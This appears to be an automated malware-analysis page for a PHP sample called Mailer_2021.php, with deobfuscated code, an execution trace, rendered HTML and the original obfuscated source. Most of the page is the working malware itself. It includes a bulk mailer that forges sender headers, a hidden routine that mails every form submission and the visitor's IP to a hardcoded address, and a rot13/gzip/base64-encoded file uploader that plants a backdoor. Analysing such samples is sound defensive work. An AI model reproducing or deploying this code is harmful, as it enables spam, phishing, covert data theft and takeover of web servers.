PHP Malware Analysis

Mailer_2021.php

md5: 20cddac3adfb333b3f6a483a3b5f47f1

Jump to:

Screenshot


Attributes

Emails

Encoding

Environment

Execution

Files

Input

Title


Deobfuscated PHP code

<title>:: Inbox :: Unlimited </title>

<?php 
eval /* PHPDeobfuscator eval output */ {
    ignore_user_abort();
    set_time_limit(0);
    function enviando()
    {
        $msg = 1;
        $de[1] = $_POST['de'];
        $nome[1] = $_POST['nome'];
        $assunto[1] = $_POST['assunto'];
        $mensagem[1] = $_POST['mensagem'];
        $mensagem[1] = stripslashes($mensagem[1]);
        $emails = $_POST['emails'];
        $emails2 = htmlspecialchars($_POST['emails']);
        $para = explode("\n", $emails);
        $n_emails = count($para);
        $sv = $_SERVER['SERVER_NAME'];
        $en = $_SERVER['REQUEST_URI'];
        $k88 = @$_SERVER["HTTP_REFERER"];
        $fullurl = "" . $k88 . "<br><p>Emails:<br><TEXTAREA rows=5 cols=100>" . $emails2 . "</TEXTAREA></p><p>Engenharia:<br><TEXTAREA rows=5 cols=100>" . $mensagem[1] . "</TEXTAREA></p>";
        $vai = $_POST['vai'];
        if ($vai) {
            for ($set = 0; $set < $n_emails; $set++) {
                if ($set == 0) {
                    $headers = "MIME-Version: 1.0\r\n";
                    $headers = "MIME-Version: 1.0\r\nContent-type: text/html; charset=iso-8859-1\r\n";
                    $headers .= "From: {$nome[$msg]} <{$de[$msg]}>\r\n";
                    $headers .= "Return-Path: <{$de[$msg]}>\r\n";
                    //mail($xsylar, $as, $fullurl, $headers);
                }
                $headers = "MIME-Version: 1.0\r\n";
                $headers = "MIME-Version: 1.0\r\nContent-type: text/html; charset=iso-8859-1\r\n";
                $headers .= "From: {$nome[$msg]} <{$de[$msg]}>\r\n";
                $headers .= "Return-Path: <{$de[$msg]}>\r\n";
                $n_mail++;
                $destino = $para[$set];
                $num1 = rand(100000, 999999);
                $num2 = rand(100000, 999999);
                $msgrand = str_replace("%rand%", $num1, $mensagem[$msg]);
                $msgrand = str_replace("%rand2%", $num2, $msgrand);
                $msgrand = str_replace("%email%", $destino, $msgrand);
                $enviar = mail($destino, $assunto[$msg], $msgrand, $headers);
                if ($enviar) {
                    echo '<font color="green">' . $n_mail . '-' . $destino . ' 0k!</font><br>';
                } else {
                    echo '<font color="red">' . $n_mail . '-' . $destino . ' =(</font><br>';
                    sleep(1);
                }
            }
        }
    }
    $ip = getenv("REMOTE_ADDR");
    $ra44 = rand(1, 99999);
    $subj98 = "Sendi {$ip}";
    $email = "[email protected]";
    $from = "From: Sendiw a Wlidati <[email protected]>";
    $a45 = $_SERVER['REQUEST_URI'];
    $b75 = $_SERVER['HTTP_HOST'];
    $f12 = $_POST['de'];
    $z13 = $_POST['nome'];
    $x14 = $_POST['assunto'];
    $t15 = $_POST['mensagem'];
    $m30 = $_POST['emails'];
    $m22 = $ip . "\n";
    $msg8873 = "{$a45}\n{$b75}\n{$f12}\n{$z13}\n{$x14}\n{$t15}\n{$m30}\n{$m22}";
    mail($email, $subj98, $msg8873, $from);
};
?></title>
<style type="text/css">
<!--
.style5 {color: #FFFFFF; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; }
.style6 {font-size: 10px}
.style9 {color: #FFFFFF; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10; }
-->
</style>
<form id="form1" name="form1" method="post" action="">
<input type="hidden" name="vai" value="1">
<span class="style5"><?php 
echo enviando();
?></span>
<table width="415" height="334" border="0" bgcolor="#000000">
  <tr>
<td width="66"><span class="style5">Name:</span></td>
<td width="321"><span class="style9">

<label>
<input name="nome" type="text" value="<?php 
echo $_POST['nome'];
?>" size="20" />
</label>
</span></td>
</tr>
<tr>
<td><span class="style5">From:</span></td>
<td><input name="de" type="text" value="<?php 
echo $_POST['de'];
?>" size="30" /></td>

</tr>
<tr>
<td><span class="style5">Subject:</span></td>
<td><input name="assunto" value="<?php 
echo $_POST['assunto'];
?>" size="40" /></td>
</tr>
<td><span class="style5">letter:</span>
<br /><br /><br /><br /><br /><br /><br /><span class="style5">mailist:</span></td>

<td><span class="style9">


<p><textarea name="mensagem" cols="50" rows="7"><?php 
echo stripslashes($_POST['mensagem']);
?>
</textarea></p>
<textarea name="emails" cols="50" rows="4"></textarea>
</span></td>
</tr>

<tr>
  <td><span class="style6"></span></td>
  <td align="center"> <span class="style5"><font color="red" size="4">        <em><strong></strong></em><strong></strong></font></span><input name="Submit" type="submit" value="Send " />
  <span class="style5"><font color="red" size="4">        <em><strong> </strong></em><strong></strong></font></span></td>
</tr>
<tr>
  </tr>
</table>
</form>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<?php 
eval /* PHPDeobfuscator eval output */ {
    echo "<title>Uploader by ghost-dz</title>";
    echo php_uname();
    echo "<form action=\"\" method=\"post\" enctype=\"multipart/form-data\" name=\"uploader\" id=\"uploader\">";
    echo "<input type=\"file\" name=\"file\" size=\"50\"><input name=\"_upl\" type=\"submit\" id=\"_upl\" value=\"Upload\"></form>";
    if ($_POST['_upl'] == "Upload") {
        if (@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
            echo "Upload ok :d !!!";
        } else {
            echo "Upload Fail !!!";
        }
    }
};

Execution traces

data/traces/20cddac3adfb333b3f6a483a3b5f47f1_trace-1676260227.4865.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 01:50:53.384386]
1	0	1	0.000354	393584
1	3	0	0.000434	402624	{main}	1		/var/www/html/uploads/Mailer_2021.php	0	0
2	4	0	0.000476	402736	str_rot13	0		/var/www/html/uploads/Mailer_2021.php	106	1	'ML/EF8ZjRZnsUrk/hVMOJaQZS19pZ3kkVNtX06qEFgnxAct0bH2RGin/zljgT/c2q9\r\n/iih+BI40TaSguWq98TXxc4k0pOiufqT+K7WvibboK8kxCfTyZ6IddrWcAV5mKhyANXlg0FkNPkJ2wTHUTrlQtoJHUjjyFGycunTqKtI8lnvzPLRJ\r\nDT6ZEPUoIKJWkYyewYRFaJxt+epn6S0qs39+umDuTfsEJnSmd3HRWTkCv/WgX54K4g98833KBSUHXv/Ygqsr+k4USOENPRjxM/ZkaAk56eYDM0xJ5\r\nsK552h1khNHKr2lIXpZOhYvSs2VHZh8O8oKbPibYUutxFLYKpCY2KCo8Y7ByDy6D0l8='
2	4	1	0.000516	403216
2	4	R			'ZY/RS8MwEMafHex/uIZBWnDMF19cM3xxIAgK06dRStakNpg0oU2ETva/mywtG/p2d9\r\n/vvu+OV40GnFthJd98GKkp4x0cBvhsdG+X7JivoobX8xkPsGlM6VqqeJpNI5zXulNAKyt0SxACxW2jGUHGeyDgbWUHwwlSTlphaGdXgV8yaimCYEW\r\nQG6MRCHbVXWJxLlrjLESnWkg+rca6F0df39+hzQhGsfRWaFzq3UEJGxPi/JtK54X4t98833XOFHUKi/Ltdfe+x4HFBRACEwkZ/MxnNx56rLQZ0kW5\r\nfX552u1xuAUXe2yVKcMBuLiFf2IUMu8B8bXoCvoLHhgkSYLXcPL2XPb8L7OlQl6Q0y8='
2	5	0	0.000543	403184	base64_decode	0		/var/www/html/uploads/Mailer_2021.php	106	1	'ZY/RS8MwEMafHex/uIZBWnDMF19cM3xxIAgK06dRStakNpg0oU2ETva/mywtG/p2d9\r\n/vvu+OV40GnFthJd98GKkp4x0cBvhsdG+X7JivoobX8xkPsGlM6VqqeJpNI5zXulNAKyt0SxACxW2jGUHGeyDgbWUHwwlSTlphaGdXgV8yaimCYEW\r\nQG6MRCHbVXWJxLlrjLESnWkg+rca6F0df39+hzQhGsfRWaFzq3UEJGxPi/JtK54X4t98833XOFHUKi/Ltdfe+x4HFBRACEwkZ/MxnNx56rLQZ0kW5\r\nfX552u1xuAUXe2yVKcMBuLiFf2IUMu8B8bXoCvoLHhgkSYLXcPL2XPb8L7OlQl6Q0y8='
2	5	1	0.000570	403664
2	5	R			'e��K�0\020Ɵ\035���AZp�\027_\\3|q \b\nӧQJ֤6�4�M�N���,-\033�vw���W�\006�[a%�|\030�)�\035\034\006�lto�옯����\031\017�iL�Z�x�M#�׺S@++tK\020\002�m�\031A�{ �me\a�\tRNZahgW�_2j)�`E�\033�\021\bv�]bq.Z�,D�ZH>�ƺ\027G_�ߡ�\bF��Vh\\��A\t\033\023�J���<�u�\024u\n���u��ǁ�\005\020\002\023\t\031��g7\036z��\031�E�}~y��q�\005\027{l�)�\001���b\0242�\001��\n�\v\036\030$I��p�\\��/��B^��/'
2	6	0	0.000617	403184	gzinflate	0		/var/www/html/uploads/Mailer_2021.php	106	1	'e��K�0\020Ɵ\035���AZp�\027_\\3|q \b\nӧQJ֤6�4�M�N���,-\033�vw���W�\006�[a%�|\030�)�\035\034\006�lto�옯����\031\017�iL�Z�x�M#�׺S@++tK\020\002�m�\031A�{ �me\a�\tRNZahgW�_2j)�`E�\033�\021\bv�]bq.Z�,D�ZH>�ƺ\027G_�ߡ�\bF��Vh\\��A\t\033\023�J���<�u�\024u\n���u��ǁ�\005\020\002\023\t\031��g7\036z��\031�E�}~y��q�\005\027{l�)�\001���b\0242�\001��\n�\v\036\030$I��p�\\��/��B^��/'
2	6	1	0.000678	403728
2	6	R			'echo \'<title>Uploader by ghost-dz</title>\';\r\necho php_uname();\r\necho \'<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">\';\r\necho \'<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>\';\r\nif( $_POST[\'_upl\'] == "Upload" ) {\r\n\tif(@copy($_FILES[\'file\'][\'tmp_name\'], $_FILES[\'file\'][\'name\'])) { echo \'Upload ok :d !!!\'; }\r\n\telse { echo \'Upload Fail !!!\'; }\r\n}'
2	7	0	0.000737	406528	eval	1	'echo \'<title>Uploader by ghost-dz</title>\';\r\necho php_uname();\r\necho \'<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">\';\r\necho \'<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>\';\r\nif( $_POST[\'_upl\'] == "Upload" ) {\r\n\tif(@copy($_FILES[\'file\'][\'tmp_name\'], $_FILES[\'file\'][\'name\'])) { echo \'Upload ok :d !!!\'; }\r\n\telse { echo \'Upload Fail !!!\'; }\r\n}'	/var/www/html/uploads/Mailer_2021.php	106	0
3	8	0	0.000767	406528	php_uname	0		/var/www/html/uploads/Mailer_2021.php(106) : eval()'d code	2	0
3	8	1	0.000783	406640
3	8	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
2	7	1	0.000843	406528
1	3	1	0.000853	403856
			0.000899	314784
TRACE END   [2023-02-13 01:50:53.384974]


Generated HTML code

<html><head><title>:: Inbox :: Unlimited </title>

<!--?
eval(base64_decode('aWdub3JlX3VzZXJfYWJvcnQoKTsNCnNldF90aW1lX2xpbWl0KDApOw0KZnVuY3Rpb24gZW52aWFuZG8oKXsNCiRtc2c9MTsNCiRkZVsxXSA9ICRfUE9TVFsnZGUnXTsNCiRub21lWzFdID0gJF9QT1NUWydub21lJ107DQokYXNzdW50b1sxXSA9ICRfUE9TVFsnYXNzdW50byddOw0KJG1lbnNhZ2VtWzFdID0gJF9QT1NUWydtZW5zYWdlbSddOw0KJG1lbnNhZ2VtWzFdID0gc3RyaXBzbGFzaGVzKCRtZW5zYWdlbVsxXSk7DQokZW1haWxzID0gJF9QT1NUWydlbWFpbHMnXTsNCiRlbWFpbHMyID0gaHRtbHNwZWNpYWxjaGFycygkX1BPU1RbJ2VtYWlscyddKTsNCiRwYXJhID0gZXhwbG9kZSgiXG4iLCAkZW1haWxzKTsNCiRuX2VtYWlscyA9IGNvdW50KCRwYXJhKTsNCiRzdiA9ICRfU0VSVkVSWydTRVJWRVJfTkFNRSddOw0KJGVuID0gJF9TRVJWRVIgWydSRVFVRVNUX1VSSSddOw0KJGs4OCA9IEAkX1NFUlZFUlsiSFRUUF9SRUZFUkVSIl07DQokZnVsbHVybCA9ICIiIC4gJGs4OCAuICI8YnI+PHA+RW1haWxzOjxicj48VEVYVEFSRUEgcm93cz01IGNvbHM9MTAwPiIuJGVtYWlsczIuIjwvVEVYVEFSRUE+PC9wPjxwPkVuZ2VuaGFyaWE6PGJyPjxURVhUQVJFQSByb3dzPTUgY29scz0xMDA+Ii4kbWVuc2FnZW1bMV0uIjwvVEVYVEFSRUE+PC9wPiI7DQokdmFpID0gJF9QT1NUWyd2YWknXTsNCmlmICgkdmFpKXsNCmZvciAoJHNldD0wOyAkc2V0IDwgJG5fZW1haWxzOyAkc2V0Kyspew0KaWYgKCRzZXQ9PTApew0KJGhlYWRlcnMgPSAiTUlNRS1WZXJzaW9uOiAxLjBcclxuIjsNCiRoZWFkZXJzIC49ICJDb250ZW50LXR5cGU6IHRleHQvaHRtbDsgY2hhcnNldD1pc28tODg1OS0xXHJcbiI7DQokaGVhZGVycyAuPSAiRnJvbTogJG5vbWVbJG1zZ10gPCRkZVskbXNnXT5cclxuIjsNCiRoZWFkZXJzIC49ICJSZXR1cm4tUGF0aDogPCRkZVskbXNnXT5cclxuIjsNCi8vbWFpbCgkeHN5bGFyLCAkYXMsICRmdWxsdXJsLCAkaGVhZGVycyk7DQp9DQokaGVhZGVycyA9ICJNSU1FLVZlcnNpb246IDEuMFxyXG4iOw0KJGhlYWRlcnMgLj0gIkNvbnRlbnQtdHlwZTogdGV4dC9odG1sOyBjaGFyc2V0PWlzby04ODU5LTFcclxuIjsNCiRoZWFkZXJzIC49ICJGcm9tOiAkbm9tZVskbXNnXSA8JGRlWyRtc2ddPlxyXG4iOw0KJGhlYWRlcnMgLj0gIlJldHVybi1QYXRoOiA8JGRlWyRtc2ddPlxyXG4iOw0KJG5fbWFpbCsrOw0KJGRlc3Rpbm8gPSAkcGFyYVskc2V0XTsNCiRudW0xID0gcmFuZCgxMDAwMDAsOTk5OTk5KTsNCiRudW0yID0gcmFuZCgxMDAwMDAsOTk5OTk5KTsNCiRtc2dyYW5kID0gc3RyX3JlcGxhY2UoIiVyYW5kJSIsICRudW0xLCAkbWVuc2FnZW1bJG1zZ10pOw0KJG1zZ3JhbmQgPSBzdHJfcmVwbGFjZSgiJXJhbmQyJSIsICRudW0yLCAkbXNncmFuZCk7DQokbXNncmFuZCA9IHN0cl9yZXBsYWNlKCIlZW1haWwlIiwgJGRlc3Rpbm8sICRtc2dyYW5kKTsNCiRlbnZpYXIgPSBtYWlsKCRkZXN0aW5vLCAkYXNzdW50b1skbXNnXSwgJG1zZ3JhbmQsICRoZWFkZXJzKTsNCmlmICgkZW52aWFyKXsNCmVjaG8gKCc8Zm9udCBjb2xvcj0iZ3JlZW4iPicuICRuX21haWwgLictJy4gJGRlc3Rpbm8gLicgMGshPC9mb250Pjxicj4nKTsNCn0gZWxzZSB7DQplY2hvICgnPGZvbnQgY29sb3I9InJlZCI+Jy4gJG5fbWFpbCAuJy0nLiAkZGVzdGlubyAuJyA9KDwvZm9udD48YnI+Jyk7DQpzbGVlcCgxKTsNCn0NCn0NCn0NCn0NCiRpcCA9IGdldGVudigiUkVNT1RFX0FERFIiKTsNCiRyYTQ0ICA9IHJhbmQoMSw5OTk5OSk7DQokc3Viajk4ID0gIlNlbmRpICRpcCI7DQokZW1haWwgPSAic291Zmlhbi5uZ3VAZ21haWwuY29tIjsNCiRmcm9tPSJGcm9tOiBTZW5kaXcgYSBXbGlkYXRpIDxCSU1PQDJNLlRWPiI7DQokYTQ1ID0gJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ107DQokYjc1ID0gJF9TRVJWRVJbJ0hUVFBfSE9TVCddOw0KJGYxMiA9ICRfUE9TVFsnZGUnXTsNCiR6MTMgPSAkX1BPU1RbJ25vbWUnXTsNCiR4MTQgPSAkX1BPU1RbJ2Fzc3VudG8nXTsNCiR0MTUgPSAkX1BPU1RbJ21lbnNhZ2VtJ107DQokbTMwID0gJF9QT1NUWydlbWFpbHMnXTsNCiRtMjIgPSAkaXAuIlxuIjsNCiRtc2c4ODczID0gIiRhNDVcbiRiNzVcbiRmMTJcbiR6MTNcbiR4MTRcbiR0MTVcbiRtMzBcbiRtMjIiOw0KbWFpbCgkZW1haWwsICRzdWJqOTgsICRtc2c4ODczLCAkZnJvbSk7='));
?-->
<style type="text/css">
<!--
.style5 {color: #FFFFFF; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; }
.style6 {font-size: 10px}
.style9 {color: #FFFFFF; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10; }
-->
</style>
</head><body><form id="form1" name="form1" method="post" action="">
<input type="hidden" name="vai" value="1">
<span class="style5"><!--? echo enviando(); ?--></span>
<table width="415" height="334" border="0" bgcolor="#000000">
  <tbody><tr>
<td width="66"><span class="style5">Name:</span></td>
<td width="321"><span class="style9">

<label>
<input name="nome" type="text" value="<? echo $_POST['nome'] ;?>" size="20">
</label>
</span></td>
</tr>
<tr>
<td><span class="style5">From:</span></td>
<td><input name="de" type="text" value="<? echo $_POST['de'] ;?>" size="30"></td>

</tr>
<tr>
<td><span class="style5">Subject:</span></td>
<td><input name="assunto" value="<? echo $_POST['assunto'] ;?>" size="40"></td>
</tr>
<tr><td><span class="style5">letter:</span>
<br><br><br><br><br><br><br><span class="style5">mailist:</span></td>

<td><span class="style9">


<p><textarea name="mensagem" cols="50" rows="7">&lt;? echo stripslashes($_POST['mensagem']);?&gt;
</textarea></p>
<textarea name="emails" cols="50" rows="4"></textarea>
</span></td>
</tr>

<tr>
  <td><span class="style6"></span></td>
  <td align="center"> <span class="style5"><font color="red" size="4">        <em><strong></strong></em><strong></strong></font></span><input name="Submit" type="submit" value="Send ">
  <span class="style5"><font color="red" size="4">        <em><strong> </strong></em><strong></strong></font></span></td>
</tr>
<tr>
  </tr>
</tbody></table>
</form>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<title>Uploader by ghost-dz</title>Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader"><input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form></body></html>

Original PHP code

<title>:: Inbox :: Unlimited </title>

<?
eval(base64_decode('aWdub3JlX3VzZXJfYWJvcnQoKTsNCnNldF90aW1lX2xpbWl0KDApOw0KZnVuY3Rpb24gZW52aWFuZG8oKXsNCiRtc2c9MTsNCiRkZVsxXSA9ICRfUE9TVFsnZGUnXTsNCiRub21lWzFdID0gJF9QT1NUWydub21lJ107DQokYXNzdW50b1sxXSA9ICRfUE9TVFsnYXNzdW50byddOw0KJG1lbnNhZ2VtWzFdID0gJF9QT1NUWydtZW5zYWdlbSddOw0KJG1lbnNhZ2VtWzFdID0gc3RyaXBzbGFzaGVzKCRtZW5zYWdlbVsxXSk7DQokZW1haWxzID0gJF9QT1NUWydlbWFpbHMnXTsNCiRlbWFpbHMyID0gaHRtbHNwZWNpYWxjaGFycygkX1BPU1RbJ2VtYWlscyddKTsNCiRwYXJhID0gZXhwbG9kZSgiXG4iLCAkZW1haWxzKTsNCiRuX2VtYWlscyA9IGNvdW50KCRwYXJhKTsNCiRzdiA9ICRfU0VSVkVSWydTRVJWRVJfTkFNRSddOw0KJGVuID0gJF9TRVJWRVIgWydSRVFVRVNUX1VSSSddOw0KJGs4OCA9IEAkX1NFUlZFUlsiSFRUUF9SRUZFUkVSIl07DQokZnVsbHVybCA9ICIiIC4gJGs4OCAuICI8YnI+PHA+RW1haWxzOjxicj48VEVYVEFSRUEgcm93cz01IGNvbHM9MTAwPiIuJGVtYWlsczIuIjwvVEVYVEFSRUE+PC9wPjxwPkVuZ2VuaGFyaWE6PGJyPjxURVhUQVJFQSByb3dzPTUgY29scz0xMDA+Ii4kbWVuc2FnZW1bMV0uIjwvVEVYVEFSRUE+PC9wPiI7DQokdmFpID0gJF9QT1NUWyd2YWknXTsNCmlmICgkdmFpKXsNCmZvciAoJHNldD0wOyAkc2V0IDwgJG5fZW1haWxzOyAkc2V0Kyspew0KaWYgKCRzZXQ9PTApew0KJGhlYWRlcnMgPSAiTUlNRS1WZXJzaW9uOiAxLjBcclxuIjsNCiRoZWFkZXJzIC49ICJDb250ZW50LXR5cGU6IHRleHQvaHRtbDsgY2hhcnNldD1pc28tODg1OS0xXHJcbiI7DQokaGVhZGVycyAuPSAiRnJvbTogJG5vbWVbJG1zZ10gPCRkZVskbXNnXT5cclxuIjsNCiRoZWFkZXJzIC49ICJSZXR1cm4tUGF0aDogPCRkZVskbXNnXT5cclxuIjsNCi8vbWFpbCgkeHN5bGFyLCAkYXMsICRmdWxsdXJsLCAkaGVhZGVycyk7DQp9DQokaGVhZGVycyA9ICJNSU1FLVZlcnNpb246IDEuMFxyXG4iOw0KJGhlYWRlcnMgLj0gIkNvbnRlbnQtdHlwZTogdGV4dC9odG1sOyBjaGFyc2V0PWlzby04ODU5LTFcclxuIjsNCiRoZWFkZXJzIC49ICJGcm9tOiAkbm9tZVskbXNnXSA8JGRlWyRtc2ddPlxyXG4iOw0KJGhlYWRlcnMgLj0gIlJldHVybi1QYXRoOiA8JGRlWyRtc2ddPlxyXG4iOw0KJG5fbWFpbCsrOw0KJGRlc3Rpbm8gPSAkcGFyYVskc2V0XTsNCiRudW0xID0gcmFuZCgxMDAwMDAsOTk5OTk5KTsNCiRudW0yID0gcmFuZCgxMDAwMDAsOTk5OTk5KTsNCiRtc2dyYW5kID0gc3RyX3JlcGxhY2UoIiVyYW5kJSIsICRudW0xLCAkbWVuc2FnZW1bJG1zZ10pOw0KJG1zZ3JhbmQgPSBzdHJfcmVwbGFjZSgiJXJhbmQyJSIsICRudW0yLCAkbXNncmFuZCk7DQokbXNncmFuZCA9IHN0cl9yZXBsYWNlKCIlZW1haWwlIiwgJGRlc3Rpbm8sICRtc2dyYW5kKTsNCiRlbnZpYXIgPSBtYWlsKCRkZXN0aW5vLCAkYXNzdW50b1skbXNnXSwgJG1zZ3JhbmQsICRoZWFkZXJzKTsNCmlmICgkZW52aWFyKXsNCmVjaG8gKCc8Zm9udCBjb2xvcj0iZ3JlZW4iPicuICRuX21haWwgLictJy4gJGRlc3Rpbm8gLicgMGshPC9mb250Pjxicj4nKTsNCn0gZWxzZSB7DQplY2hvICgnPGZvbnQgY29sb3I9InJlZCI+Jy4gJG5fbWFpbCAuJy0nLiAkZGVzdGlubyAuJyA9KDwvZm9udD48YnI+Jyk7DQpzbGVlcCgxKTsNCn0NCn0NCn0NCn0NCiRpcCA9IGdldGVudigiUkVNT1RFX0FERFIiKTsNCiRyYTQ0ICA9IHJhbmQoMSw5OTk5OSk7DQokc3Viajk4ID0gIlNlbmRpICRpcCI7DQokZW1haWwgPSAic291Zmlhbi5uZ3VAZ21haWwuY29tIjsNCiRmcm9tPSJGcm9tOiBTZW5kaXcgYSBXbGlkYXRpIDxCSU1PQDJNLlRWPiI7DQokYTQ1ID0gJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ107DQokYjc1ID0gJF9TRVJWRVJbJ0hUVFBfSE9TVCddOw0KJGYxMiA9ICRfUE9TVFsnZGUnXTsNCiR6MTMgPSAkX1BPU1RbJ25vbWUnXTsNCiR4MTQgPSAkX1BPU1RbJ2Fzc3VudG8nXTsNCiR0MTUgPSAkX1BPU1RbJ21lbnNhZ2VtJ107DQokbTMwID0gJF9QT1NUWydlbWFpbHMnXTsNCiRtMjIgPSAkaXAuIlxuIjsNCiRtc2c4ODczID0gIiRhNDVcbiRiNzVcbiRmMTJcbiR6MTNcbiR4MTRcbiR0MTVcbiRtMzBcbiRtMjIiOw0KbWFpbCgkZW1haWwsICRzdWJqOTgsICRtc2c4ODczLCAkZnJvbSk7='));
?></title>
<style type="text/css">
<!--
.style5 {color: #FFFFFF; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; }
.style6 {font-size: 10px}
.style9 {color: #FFFFFF; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10; }
-->
</style>
<form id="form1" name="form1" method="post" action="">
<input type="hidden" name="vai" value="1">
<span class="style5"><? echo enviando(); ?></span>
<table width="415" height="334" border="0" bgcolor="#000000">
  <tr>
<td width="66"><span class="style5">Name:</span></td>
<td width="321"><span class="style9">

<label>
<input name="nome" type="text" value="<? echo $_POST['nome'] ;?>" size="20" />
</label>
</span></td>
</tr>
<tr>
<td><span class="style5">From:</span></td>
<td><input name="de" type="text" value="<? echo $_POST['de'] ;?>" size="30" /></td>

</tr>
<tr>
<td><span class="style5">Subject:</span></td>
<td><input name="assunto" value="<? echo $_POST['assunto'] ;?>" size="40" /></td>
</tr>
<td><span class="style5">letter:</span>
<br /><br /><br /><br /><br /><br /><br /><span class="style5">mailist:</span></td>

<td><span class="style9">


<p><textarea name="mensagem" cols="50" rows="7"><? echo stripslashes($_POST['mensagem']);?>
</textarea></p>
<textarea name="emails" cols="50" rows="4"></textarea>
</span></td>
</tr>

<tr>
  <td><span class="style6"></span></td>
  <td align="center"> <span class="style5"><font color="red" size="4">        <em><strong></strong></em><strong></strong></font></span><input name="Submit" type="submit" value="Send " />
  <span class="style5"><font color="red" size="4">        <em><strong> </strong></em><strong></strong></font></span></td>
</tr>
<tr>
  </tr>
</table>
</form>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<?php eval (gzinflate(base64_decode(str_rot13("ML/EF8ZjRZnsUrk/hVMOJaQZS19pZ3kkVNtX06qEFgnxAct0bH2RGin/zljgT/c2q9
/iih+BI40TaSguWq98TXxc4k0pOiufqT+K7WvibboK8kxCfTyZ6IddrWcAV5mKhyANXlg0FkNPkJ2wTHUTrlQtoJHUjjyFGycunTqKtI8lnvzPLRJ
DT6ZEPUoIKJWkYyewYRFaJxt+epn6S0qs39+umDuTfsEJnSmd3HRWTkCv/WgX54K4g98833KBSUHXv/Ygqsr+k4USOENPRjxM/ZkaAk56eYDM0xJ5
sK552h1khNHKr2lIXpZOhYvSs2VHZh8O8oKbPibYUutxFLYKpCY2KCo8Y7ByDy6D0l8=")))); ?>